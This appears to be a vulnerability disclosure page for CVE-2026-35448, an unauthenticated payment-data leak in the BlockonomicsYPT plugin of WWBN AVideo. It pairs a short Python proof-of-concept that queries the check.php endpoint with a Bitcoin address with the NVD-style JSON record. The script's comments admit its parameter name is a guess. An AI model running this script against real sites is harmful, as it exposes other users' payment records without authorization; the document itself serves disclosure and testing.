CVE-2026-35448

# PoC for CVE-2026-35448 # This script demonstrates how to retrieve payment data without authentication import requests def check_vulnerability(target_url, btc_address): # The vulnerable endpoint is typically located at the plugin path endpoint = f"{target_url}/plugin/BlockonomicsYPT/check.php" # Parameters might vary based on actual implementation, 'addr' is a common parameter for Bitcoin addresses params = { "addr": btc_address } try: response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Potential Vulnerability Detected!") print(f"[+] Response from server: {response.text}") else: print(f"[-] Server returned status code: {response.status_code}") except requests.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": # Replace with the actual target URL and a known Bitcoin address on the platform target = "http://example.com" address = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa" check_vulnerability(target, address)

{"cve": {"id": "CVE-2026-35448", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:23.157", "lastModified": "2026-04-14T19:57:27.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the BlockonomicsYPT plugin's check.php endpoint returns payment order data for any Bitcoin address without requiring authentication. The endpoint was designed as an AJAX polling helper for the authenticated invoice.php page, but it performs no access control checks of its own. Since Bitcoin addresses are publicly visible on the blockchain, an attacker can query payment records for any address used on the platform."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-3v7m-qg4x-58h9", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-3v7m-qg4x-58h9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}